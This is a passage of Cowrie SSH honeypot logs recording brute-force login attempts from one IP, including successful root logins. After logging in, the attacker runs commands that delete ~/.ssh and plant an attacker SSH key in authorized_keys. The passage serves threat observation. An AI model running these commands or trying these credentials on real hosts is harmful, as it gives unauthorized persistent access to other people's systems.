a-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:48:37.655082Z","src_ip":"212.227.235.229","session":"8c702fe3b612"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"Password1","message":"login attempt [postgres/Password1] failed","sensor":"my-vps","timestamp":"2025-09-09T01:48:38.548313Z","src_ip":"212.227.235.229","session":"8c702fe3b612"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:48:39.774729Z","src_ip":"212.227.235.229","session":"8c702fe3b612"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45428,"dst_ip":"1.2.3.4","dst_port":22,"session":"6575b81c2ca6","protocol":"ssh","message":"New connection: 212.227.235.229:45428 (1.2.3.4:22) [session: 6575b81c2ca6]","sensor":"my-vps","timestamp":"2025-09-09T01:48:47.953225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:48:47.953976Z","src_ip":"212.227.235.229","session":"6575b81c2ca6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:48:48.212329Z","src_ip":"212.227.235.229","session":"6575b81c2ca6"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"P@ssword123","message":"login attempt [deploy/P@ssword123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:48:49.287521Z","src_ip":"212.227.235.229","session":"6575b81c2ca6"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:48:50.548188Z","src_ip":"212.227.235.229","session":"6575b81c2ca6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41488,"dst_ip":"1.2.3.4","dst_port":22,"session":"26eb429420c0","protocol":"ssh","message":"New connection: 212.227.235.229:41488 (1.2.3.4:22) [session: 26eb429420c0]","sensor":"my-vps","timestamp":"2025-09-09T01:49:03.488455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:49:04.417509Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:49:04.418159Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.login.success","username":"root","password":"Default1","message":"login attempt [root/Default1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:49:06.609723Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:49:07.173317Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:49:07.174000Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:49:07.175370Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:08.170017Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:49:08.984109Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:49:08.984870Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:49:09.247450Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:09.248294Z","src_ip":"212.227.235.229","session":"26eb429420c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54862,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e92b6a75f5e","protocol":"ssh","message":"New connection: 212.227.235.229:54862 (1.2.3.4:22) [session: 6e92b6a75f5e]","sensor":"my-vps","timestamp":"2025-09-09T01:49:11.858448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:49:11.859431Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:49:12.181850Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@111","message":"login attempt [root/Admin@111] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:49:13.285252Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:49:13.854874Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:49:13.855693Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:49:13.856959Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:14.124679Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:49:14.793778Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:49:14.794461Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:49:15.062028Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:15.062903Z","src_ip":"212.227.235.229","session":"6e92b6a75f5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55980,"dst_ip":"1.2.3.4","dst_port":22,"session":"97045feddb20","protocol":"ssh","message":"New connection: 212.227.235.229:55980 (1.2.3.4:22) [session: 97045feddb20]","sensor":"my-vps","timestamp":"2025-09-09T01:49:15.311049Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:49:15.311688Z","src_ip":"212.227.235.229","session":"97045feddb20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40076,"dst_ip":"1.2.3.4","dst_port":22,"session":"446017e9960b","protocol":"ssh","message":"New connection: 212.227.235.229:40076 (1.2.3.4:22) [session: 446017e9960b]","sensor":"my-vps","timestamp":"2025-09-09T01:49:15.503471Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:49:15.572414Z","src_ip":"212.227.235.229","session":"97045feddb20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40019,"dst_ip":"1.2.3.4","dst_port":22,"session":"686e1c8108d9","protocol":"ssh","message":"New connection: 212.227.235.229:40019 (1.2.3.4:22) [session: 686e1c8108d9]","sensor":"my-vps","timestamp":"2025-09-09T01:49:16.020539Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35002,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0f983348597","protocol":"ssh","message":"New connection: 212.227.235.229:35002 (1.2.3.4:22) [session: d0f983348597]","sensor":"my-vps","timestamp":"2025-09-09T01:49:16.021703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:49:16.022541Z","src_ip":"212.227.235.229","session":"686e1c8108d9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:49:16.023296Z","src_ip":"212.227.235.229","session":"d0f983348597"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:49:16.247954Z","src_ip":"212.227.235.229","session":"686e1c8108d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:49:16.289537Z","src_ip":"212.227.235.229","session":"d0f983348597"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:49:16.675086Z","src_ip":"212.227.235.229","session":"97045feddb20"}
{"eventid":"cowrie.login.failed","username":"default","password":"abc123","message":"login attempt [default/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:49:17.188251Z","src_ip":"212.227.235.229","session":"686e1c8108d9"}
{"eventid":"cowrie.login.failed","username":"butter","password":"12345","message":"login attempt [butter/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T01:49:17.395211Z","src_ip":"212.227.235.229","session":"d0f983348597"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:17.934918Z","src_ip":"212.227.235.229","session":"97045feddb20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56950,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a7d0fb6a449","protocol":"ssh","message":"New connection: 212.227.235.229:56950 (1.2.3.4:22) [session: 6a7d0fb6a449]","sensor":"my-vps","timestamp":"2025-09-09T01:49:18.243441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:49:18.244874Z","src_ip":"212.227.235.229","session":"6a7d0fb6a449"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:49:18.414656Z","src_ip":"212.227.235.229","session":"686e1c8108d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:49:18.507249Z","src_ip":"212.227.235.229","session":"6a7d0fb6a449"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:49:18.575917Z","src_ip":"212.227.235.229","session":"446017e9960b"}
